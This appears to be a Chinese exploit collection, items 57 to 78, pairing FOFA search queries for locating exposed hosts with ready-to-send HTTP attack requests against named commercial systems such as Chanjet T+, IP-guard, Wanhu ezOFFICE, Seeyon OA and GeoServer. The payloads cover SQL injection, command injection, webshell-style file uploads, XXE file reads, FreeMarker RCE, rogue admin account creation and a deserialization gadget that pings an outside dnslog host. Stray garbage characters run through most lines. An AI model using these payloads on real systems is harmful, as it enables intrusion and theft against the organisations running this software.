5 p# u- s5 I2 x& [
{+ {, l8 h" {1 `: R1 K
"storeID":{; ]6 Q9 a0 t! }. ?
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 l) g( j2 `+ Y) V4 r5 m "MethodName":"Start",
w) w+ t/ R7 k; N! | "ObjectInstance":{
# C& q, X5 C3 I2 P0 l+ J+ B "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% V h9 J% ^* |% T; }
"StartInfo": {$ K- p `; V$ V1 W; A- J& Z& C
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
1 J3 E! r6 o, A j" K I2 Z* m2 K "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
8 k! x" h: z7 W( M( K: x& g/ } }
, n3 Z# Z3 k# h6 K5 X/ L! T }4 z2 ^2 U$ Z" ^- X& I- C/ U$ x, D
} z, U# J/ b/ e4 w+ _6 t
}# a/ {; T8 ]; O) W
- i$ W# @ e; j8 t! ~. x
* d! p2 R9 L9 `1 x8 y57. 畅捷通T+ keyEdit.aspx SQL注入
# Q+ A; F$ q$ N sFOFA:app="畅捷通-TPlus"! P+ B1 V) \" s$ s9 n0 j
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
( v- B( _5 S2 G. n" ] ]1 ]) ?9 P2 |9 iHost: host$ \4 T5 U, T r2 X6 H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' i5 u7 h+ }' y1 c* w: e+ B# F6 z
Accept-Charset: utf-8
+ a; p1 X9 ?: z; \8 @Accept-Encoding: gzip, deflate
: q7 t& W+ P0 Z% h; H: I( UConnection: close
k5 G& J; |) w3 z, L* `% q0 G6 X$ [: W4 g; o
C8 l x- U2 O" R
58. 畅捷通T+ KeyInfoList.aspx sql注入
& g8 i, L4 q% H YFOFA:app="畅捷通-TPlus"
$ Z c8 d/ |7 n' _* vGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
1 J/ _* f" r; _ F C8 I% T( b( fHost: your-ip
7 \( t/ M8 _( f( G4 w3 a A8 D1 V3 WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# x1 }- u. l* W2 @- W
Accept-Charset: utf-8( p, K- D: t O1 K
Accept-Encoding: gzip, deflate
8 c, D" s9 @2 a O0 Z, t$ _1 Y: WConnection: close
$ z- ?) ^- B% a$ J2 V) M
+ ~4 [9 P" _7 f( N& M4 v' M! T5 x3 |, o3 T7 M' b& L4 D' @
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行, a$ \" ?+ X/ |3 Q
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
/ o3 n4 d) c) S, NPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
" F' t; f# t; x- hHost: 192.168.86.128:9090( {: s: k! m( M% l k: ]" h3 }
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
# D5 l! v' ?7 M6 WConnection: close6 H0 Y% r& d/ r' X" {* v! ^; \
Content-Length: 1669; P. F U$ Y$ E0 Q( n0 Z% y
Accept: */*
( P0 R: t, U* \( Z7 ~Accept-Language: en
: N5 @! p7 N( G8 s; m4 gContent-Type: application/x-www-form-urlencoded
$ a6 [: h9 z; i' L' g4 a* }- P* fAccept-Encoding: gzip
( n! g- I$ f2 G" B$ p3 C! k2 s3 L! Q; V
PAYLOAD% }% E) E! m5 E2 s, D$ N; j2 y% Z
% C8 j* W8 `8 D5 q: y- i" O5 c
8 [/ D- C- V. S# o. c+ Q B! W60. 百卓Smart管理平台 importexport.php SQL注入
* r7 D% Y! S* ]- [7 ^ TFOFA:title="Smart管理平台"" [' x+ O+ d. K' f0 P# b
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.12 |7 U/ P: I- p
Host:3 G, T1 f% D5 i) C# g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- X2 Q2 a0 t1 G1 D. I# n0 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; L* U- B( S9 a- W6 e* A3 P( `* v1 UAccept-Encoding: gzip, deflate
1 N# { A* s- j$ PAccept-Language: zh-CN,zh;q=0.9
- D: s6 h1 q. D" G5 O, ^1 MConnection: close/ {1 u- y$ e3 q+ S4 S9 L
3 {; Z% [( g6 S0 D8 N: G, E. N
Q1 X O* u, j2 D61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! n7 N4 L' v5 _$ Y P0 J! Y% bFOFA: title="欢迎使用浙大恩特客户资源管理系统"; x) f9 U# W8 I! g
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
& ]; ~( R8 Y" j2 k0 P( ]2 t+ ?Host: x.x.x.x
) k' l- ^6 j$ D0 }/ f4 g5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; y7 p6 U5 n) e/ {. RConnection: close* f2 H7 p- I! ]
Content-Length: 27
' V1 f0 s) ?1 z! J* OAccept: */*
- k: p6 [0 e+ p# q0 [: EAccept-Encoding: gzip, deflate
; W. D) d4 j% c4 Q/ }) j2 l1 |* EAccept-Language: en
/ M" w# n7 T3 T* rContent-Type: application/x-www-form-urlencoded
( C/ |) ]1 ?: f9 [% J W
+ w, g) k3 `3 Z8 z8uxssX66eqrqtKObcVa0kid98xa
' ^' ?3 p" i. i4 ]5 V6 ^9 r! k( Q, Y1 Q# W9 b& X
! T) h9 T8 _* ~& j: s62. IP-guard WebServer 远程命令执行, i2 E4 z" p0 Q5 T3 y
FOFA:"IP-guard" && icon_hash="2030860561"
- n5 W( X' X( p1 eGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.15 d. G/ s2 X6 h' z6 I2 [
Host: x.x.x.x* G/ h, L7 g/ x: S, O# J
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
7 u1 Q T6 X* eConnection: close
3 h4 Z- T+ p1 x3 ]Accept: */*
! i( o5 P/ O6 o- i! Y0 eAccept-Language: en
0 \8 ~; q% k2 M6 z% B* k( oAccept-Encoding: gzip7 x0 t7 ~, u5 z# W. P
, ^" Y: A A1 I6 o, U' o' `2 F, N; e) _
访问* |4 r# R/ H& L! W
6 U$ y5 D: S4 A8 `
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
; K7 a% g% Y+ R* ]. U+ _Host: x.x.x.x' v- }1 N C: H; a+ ]7 V& {
( {. _7 i: q+ D- I0 s, U# B {9 d/ T( ~3 y1 [ I
63. IP-guard WebServer任意文件读取' O# \7 D7 T0 J b* p
IP-guard < 4.82.0609.0
* R2 @8 B- m% l" ]+ K' QFOFA:icon_hash="2030860561"2 Q8 U. F7 N+ ?# k" g C# i6 g9 {- i
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
: p; I5 I5 @% x7 gHost: your-ip
" R' r' r+ \5 k9 d! _7 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ [0 `: M. P# P; R- }8 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ c% W9 _7 d V+ V; ]& N, {Accept-Encoding: gzip, deflate7 q" f5 t0 v3 `+ K
Accept-Language: zh-CN,zh;q=0.9& | g( L' {+ k; | c# N) i
Connection: close
0 N% `4 |' B# ~* ^9 m+ eContent-Type: application/x-www-form-urlencoded/ _$ } g/ f9 K7 H3 R
7 Z, ~3 e* C( xpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A4 v) }% }) b: Y9 A; H
0 I9 {1 z( Y: ~' A2 n( U. @& X$ B
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
5 x3 a0 K7 c0 z8 `& aFOFA:body="/Scripts/EnjoyMsg.js"
0 H& `9 ?; L4 Z2 Z2 R$ V% S6 A, j! tPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
9 _ J8 A1 E* n, w$ E1 f& z( IHost: 192.168.86.128:9001" W3 I2 p, p! `/ T/ ?) x6 Q
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, f) J1 K& L0 L, o; g5 \2 l' v' x
Connection: close, i J/ ~8 a8 D
Content-Length: 369
' B" I. E: J$ R$ G) gAccept: */*( Q6 ~* B! t/ I
Accept-Language: en! E) ?% S; c- t' M1 ^
Content-Type: text/xml; charset=utf-8; Y# J, G* X) Y3 z6 F7 L' u6 U
Accept-Encoding: gzip1 Z2 t. C y+ s. _# X% L1 w" K$ M
9 U- [2 H! q# e0 }0 E5 s5 ?<?xml version="1.0" encoding="utf-8"?>' K& ~6 ?4 n3 @8 V) B! C" s
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. L1 B( X, g+ l$ N0 H
<soap:Body>
7 n' C$ @) P" ` [2 {8 Q <GetOSpById xmlns="http://tempuri.org/">9 h% U) b0 V- i. s0 X
<sId>1';waitfor delay '0:0:5'--+</sId>0 T. F1 x. v8 d4 K1 \
</GetOSpById>
& t- L9 [4 w) M$ V </soap:Body>
* b- N3 \! }( L) `7 r; F( O4 H</soap:Envelope>
; U8 {2 M7 M; k! a* Z8 O# h% {
/ z% v! q1 s, ~" O" G6 w1 u& f/ R
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
! o0 F6 R! r9 k" s8 Q% U YFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"4 B: Q$ S/ r2 O) U( C+ M; f, g
响应200即成功创建账号test123456/123456
: p1 _# y O- kPOST /SystemMng.ashx HTTP/1.1
) D- K, _" `! F; h/ O* E5 NHost:- D, V' G3 l- X9 k) o. @
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
# `# u* s+ H+ S: k4 d1 IAccept-Encoding: gzip, deflate( n2 U( E) Q2 V4 E- J" g( c; B+ \' m# Y
Accept: */*
; ?/ p. h" T5 j) U4 S0 f/ e& W6 `( {Connection: close* C) y: b9 A% k
Accept-Language: en
+ X0 X' P S: y9 _7 k$ SContent-Length: 174 V9 B" N( ^% ~* U9 Z
6 p8 P/ C' G) b* DoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
: Q$ }$ z$ M4 k4 T) v1 n; j
7 x/ Z1 P' L7 V; v7 p
+ O/ t* N- p+ E1 g: R66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. e% F8 B: K2 v0 G; ~FOFA:app="万户ezOFFICE协同管理平台". V7 O1 ?' d O# }" s# w3 y" j
9 ?* z. i6 T, K t# m2 K
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.13 y6 g. X( g& I S1 g
Host: x.x.x.x
5 _4 R9 o0 A4 K6 p* \8 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ S1 T5 r# l2 G4 ?: M/ e2 a( OConnection: close
- ?3 y6 }/ n. h; [Accept: */*0 h3 d' P7 [; K, h7 O
Accept-Language: en7 d( |2 m6 k) |( o" y9 Z
Accept-Encoding: gzip
* z6 R* @ g" u: s |% z8 ^9 U8 |
2 S3 C4 X8 q! G: L4 \5 e- J/ A: J2 j
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
+ ]' A" O4 H0 e8 G5 b: ]7 S7 S5 O; U+ U5 _& j
67. 万户ezOFFICE wpsservlet任意文件上传9 a2 @2 g6 s& M0 g8 V
FOFA:app="万户网络-ezOFFICE") j# R# o9 R d5 S2 G% F
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型: n, w( K$ x7 z. O" X5 k- q# k7 g) _
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
3 T; l" b5 N1 }9 P$ o! @1 I6 m' `Host: x.x.x.x1 [4 u) K3 R% A* o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
, W* Q5 i3 l$ D r: F( EContent-Length: 173
5 C- s* @7 s: p4 F9 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.84 s/ S+ j1 o$ t. A ~! ]1 l0 K) n
Accept-Encoding: gzip, deflate- }9 A8 M0 G3 ]6 N
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
6 K' S( C% x. s1 y: q+ @Connection: close
" e3 C: b: ?( }4 O* D1 ]Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
5 g/ H4 P! V. v5 k' k9 |& k uDNT: 1
, i8 w5 q, c; r/ kUpgrade-Insecure-Requests: 1# D# g9 G) a2 N) r
. g$ M& P% @0 X0 j W' e; M2 R
--ufuadpxathqvxfqnuyuqaozvseiueerp
" Q3 y2 A6 ]( H9 x, K% P' qContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
" X5 o1 c7 N" u( ~& V, s& b; i$ h7 @; M9 W# ^+ B
<% out.print("sasdfghjkj");%>
: ~- ?1 b s9 h( v--ufuadpxathqvxfqnuyuqaozvseiueerp--) d8 n [0 G) @( ]
* N' F+ j9 i m4 z7 S
$ [, _8 w2 P2 z
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
, U3 m6 C5 Y; [* k, q
. }% ~: h% F6 D) q6 ?68. 万户ezOFFICE wf_printnum.jsp SQL注入
1 q+ u- s1 W% x/ BFOFA:app="万户ezOFFICE协同管理平台"
4 X: m! j U% R* B9 j& {/ J! tGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1- X5 _5 w/ j6 S. g) k; w7 q
Host: {{host}}7 k! E% X/ A: V E4 P0 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
5 q% y& D, L. P/ F; A' }, T/ [Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8- V! y4 ~( n, _, Q0 L: X
Accept-Encoding: gzip, deflate
v r$ m6 f- X) @" IAccept-Language: zh-CN,zh;q=0.9% ^$ [+ F; C0 t7 ?
Connection: close
# A- G1 y9 j6 ~% d) d. a" _7 | A" U; l8 `( T# ?' f6 A
6 m$ J) i& n e69. 万户 ezOFFICE contract_gd.jsp SQL注入
" h# R2 m+ r6 w' C! H) V0 _FOFA:app="万户ezOFFICE协同管理平台"0 l- M3 N7 ~! Z- T' ]1 d; g4 q
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1/ @# W7 F! p% z/ o$ r; l
Host: your-ip3 K, B! a* p; [, k& q1 v2 z! n
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& q# c5 t, l% O5 I# I* m1 F4 i! ]6 J' oAccept-Encoding: gzip, deflate- l8 o) V7 M: B! W
Accept: */*
/ K1 G2 U( b4 o7 n% m8 I: J+ X* Y2 iConnection: keep-alive
* _! A6 h% S; g# I# F
$ D) S( b: n7 t8 ^
9 c1 Q5 G6 \. i& b, Z! }4 c70. 万户ezEIP success 命令执行" V0 A( U: [+ o* L. a* W& I
FOFA:app="万户网络-ezEIP"
; i& J7 l5 D) Z) R9 bPOST /member/success.aspx HTTP/1.1
) X! b2 e" `% B, j9 yHost: {{Hostname}}
& d* R- s8 z$ L, Q& s$ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' E$ t4 p& V9 t4 O; u; ^
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
3 r) t( R: J' @7 bContent-Type: application/x-www-form-urlencoded( x' O& y* d$ G
TYPE: C
0 N7 z# x6 U/ @7 yContent-Length: 16702' P* ?6 v" Q% w6 Y- S
. B$ z) A" `* I5 l0 c) K__VIEWSTATE=PAYLOAD: }7 R6 \1 \9 d% w9 _: H& n" A0 D/ S* P
7 }5 N' p' G9 M& ~6 S8 v# z: E; g$ x$ L+ a
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
m# Z+ n. o: n( `! o- x3 xFOFA:body="PM2项目管理系统BS版增强工具.zip"
Z' I: Q5 ?: Z( M- ~" K& qGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
9 T& ?7 z+ J8 r tHost: x.x.x.xx.x.x.x
: l( N0 j) ]# o3 e) kUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. O" O' s' {! C: S# w/ f( C% Y2 W
Connection: close
( T# n+ z$ j( g* \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* w: V5 j7 s d! K5 O' t' C. x& hAccept-Encoding: gzip, deflate
! T U4 T. h" e0 X3 V" kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ?: Y, i* i9 n8 F5 G: D
Upgrade-Insecure-Requests: 1
9 J3 L& n2 v$ @2 q
0 i+ W7 q5 A% k! _1 {1 q" Z( Q8 R2 q" ?) U7 u' E( x9 z# o$ D
72. 致远OA getAjaxDataServlet XXE" M; B8 x9 D9 M' t+ I
FOFA:app="致远互联-OA"
" e& h8 C. ?. {$ |1 C4 [% FPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
$ `. S: ]% A% _8 }3 JHost: 192.168.40.131:8099( B& j& r- A1 d& N2 b; y: Z
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
* l/ U1 \* t: n; q0 X3 AConnection: close q: G, [* \: p$ m4 k/ a
Content-Length: 5836 Z4 b5 y* O. Y3 b4 i
Content-Type: application/x-www-form-urlencoded5 B" J! h7 z1 ^8 G4 K
Accept-Encoding: gzip
Q/ U |3 i2 q S4 a3 b+ r- L+ u
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 g, f. t/ H9 \6 v
/ e$ \, `& L9 o3 s9 M2 H( G1 E: M c! h' s+ F
73. GeoServer wms远程代码执行* x6 c$ v6 m3 B% b# e9 t* _
FOFA:icon_hash=”97540678”
% [# P6 c& j& y% j* I4 oPOST /geoserver/wms HTTP/1.1
% C4 B0 a+ [: X; C/ F. LHost:
# n% s( p/ Q- N( Y3 r+ K MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 l1 K$ U% ]6 p6 n* V5 WContent-Length: 1981; D8 B. h% _( e: G
Accept-Encoding: gzip, deflate) w f: t! }4 T {( j
Connection: close
4 a( a" g2 Z! E+ V1 D1 LContent-Type: application/xml8 Y+ o& a, z7 h! u" M
SL-CE-SUID: 3/ O0 `6 {: @- s% ~
. w) z# D) x% |3 L; J
PAYLOAD
k3 T Q' }+ x* s2 e
, G3 z, e0 `& z( O
. m* I3 t5 s! g: u0 d# h* M9 R! ~74. 致远M3-server 6_1sp1 反序列化RCE
7 M. A7 q& S. IFOFA:title="M3-Server"
2 M2 D+ X u7 k9 }# ?PAYLOAD
, }# E8 J0 F* ?, E) l+ G3 X. D- Q! \( T9 c6 H" y
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
% W2 N9 }2 ^3 yFOFA:app="TELESQUARE-TLR-2005KSH"/ [) x; I/ L7 d) F
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1% X$ G2 u& p& G5 }$ q
Host: x.x.x.x$ Q: A% Y/ P j, [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 t4 \$ S1 Q! j `% i
Connection: close
+ K8 z7 j3 D p$ N# V r4 cAccept: */*
1 d. o5 P" p3 }7 F; S/ i& yAccept-Language: en, K$ u/ \& V3 f6 }# G3 l3 `& s
Accept-Encoding: gzip
1 I6 w7 V& q- Z- K. k, u" [3 j: H' z0 ?
5 W( P* O# _4 h M) BGET /cgi-bin/test28256.txt HTTP/1.1
4 u4 t& S$ ~( ~& X1 E/ a9 Y6 K" EHost: x.x.x.x4 l' e1 G5 a, H k6 O$ H& `
/ \& T" a; y' H0 D* c/ {, u& V: ] }* E
76. 新开普掌上校园服务管理平台service.action远程命令执行6 G' ^; y2 j. \ d2 @9 G
FOFA:title="掌上校园服务管理平台"
7 S p" Q4 v" K; k: Y2 xPOST /service_transport/service.action HTTP/1.19 G- p% U) U1 L2 M. c6 F
Host: x.x.x.x
7 n" \2 D/ V# H/ e. z8 f% VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
9 t' w- }2 j1 l6 k" y! LConnection: close- H$ p& v- ]5 D
Content-Length: 211
/ d6 o$ T6 @) P$ [$ o$ g8 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 {3 f) q5 ]6 A
Accept-Encoding: gzip, deflate& m5 r, h( i! Z$ o3 F( {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
o! m5 j: j" [5 g2 F' E. UCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
+ Z2 x' F/ K, T) w& v5 q2 GUpgrade-Insecure-Requests: 1* r: |9 d+ j: M# Y! S, D+ V
+ }7 ~9 B4 [4 V; j7 J- J+ I
{
K$ P- H0 \! i" w"command": "GetFZinfo",
3 z4 m0 H" t$ a7 k, Q "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\", E5 b" W$ E7 U) e5 S
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"2 \# G& s1 |$ x
}5 g. f( r( l: l2 j2 y
o7 I0 U: J* \- w+ }
' i$ _* f" F$ uGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
% s( T2 T* E5 E/ K% \* PHost: x.x.x.x" k; b1 X* m" m) x( k
* f) J7 _1 b- d% @' S5 }# d% T
( _* ^, @* c. I4 n$ Q( y1 R
/ d' Z# Q7 D! B0 I77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! o7 m5 k0 w* f: i3 h LFOFA:body="F22WEB登陆"
: f$ x" N" ]5 V* HPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
# @% `$ M$ O6 T9 @ DHost: x.x.x.x
; b+ g5 e- m1 w2 E1 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
^2 ]. }: D( \- a( wConnection: close' `+ l+ _! ~: X% @; X* E3 i
Content-Length: 433
( e( u6 L. _8 N- a$ E2 ?Accept: */*; Y$ V. ^2 x$ h7 Y* O# B- w. l6 s
Accept-Encoding: gzip, deflate
" S( R( K2 T1 n, o) M4 ~Accept-Language: zh-CN,zh;q=0.9
9 r! [5 {) m" d1 C; jContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix; h( Q1 y9 e4 M8 A$ i( o+ O h
# d- m" p5 \8 p q# [7 X------------398jnjVTTlDVXHlE7yYnfwBoix. C& B7 n* C/ L8 q2 \! m. ]) ^! q. }
Content-Disposition: form-data; name="folder"( d: i; J( u. B8 E! C
5 C$ V. k* F# c4 q! z, _, {5 T/upload/udplog
, N' b4 O9 S* u0 R------------398jnjVTTlDVXHlE7yYnfwBoix- Q- r- {* w7 u% m% K
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"5 I, L3 ?; a7 `: G5 [) S& D
Content-Type: application/octet-stream
; z! b& P% Y9 T L2 b) S0 _# d3 N% v% p. \) A. f/ X. G) K& Y
hello1234567
+ g0 J& e, c$ M; @------------398jnjVTTlDVXHlE7yYnfwBoix
) o# l: m2 ]1 A- ^Content-Disposition: form-data; name="Upload"
- M$ a0 d1 E4 L' O7 X2 _: S% p3 n" n7 X8 t
Submit Query
! C) n8 z' e6 r------------398jnjVTTlDVXHlE7yYnfwBoix--
6 G' T9 A- K* _ l* P" d5 ~0 d X
" w4 x8 R! x# l3 T+ U% T: D8 M& }7 G6 K5 c% L; w$ `
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传 D3 P' w- b$ ]- {0 B5 U* ^
FOFA:icon_hash="2001627082"$ I2 w) I ]# k' c7 K$ K% y( i8 H: O
POST /Platform/System/FileUpload.ashx HTTP/1.1' W: C$ A( G" {4 ~- T9 t
Host: x.x.x.x
4 @7 \* r1 Z4 ~5 V HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 T! k. U8 v0 r
Connection: close
4 f. {: [7 N% s; j* A; ]% zContent-Length: 336 _ s) j' T; E5 F/ t& k
Accept-Encoding: gzip
; f4 l! [3 Y4 _% ?/ y9 B) [Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l0 a' k& S8 A2 h
4 e* E; o" y- y( U3 b) U. M; E' a) I------YsOxWxSvj1KyZow1PTsh98fdu6l6 n% V: F! T' b W& C+ u
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
# c2 F! n2 k4 f: JContent-Type: image/png: i) }, x' K+ b) ^' Y& r4 U
/ F! z4 k: y( @- v: u# bYsOxWxSvj1KyZow1PTsh98fdu6l* [' `$ g [. z$ w
------YsOxWxSvj1KyZow1PTsh98fdu6l
# t- H. @8 ^* ~2 N$ rContent-Disposition: form-data; name="target"4 K5 y+ d4 K& X7 V/ T! f
8 R; G/ N/ q' n! J4 J6 [( c
/Applications/SkillDevelopAndEHS/ L- v4 \$ g3 A7 m7 h5 ]$ T- L
------YsOxWxSvj1KyZow1PTsh98fdu6l--
, R% z& B5 {6 @* i [: r" S4 H
0 A9 p% Y$ h. }! L* E
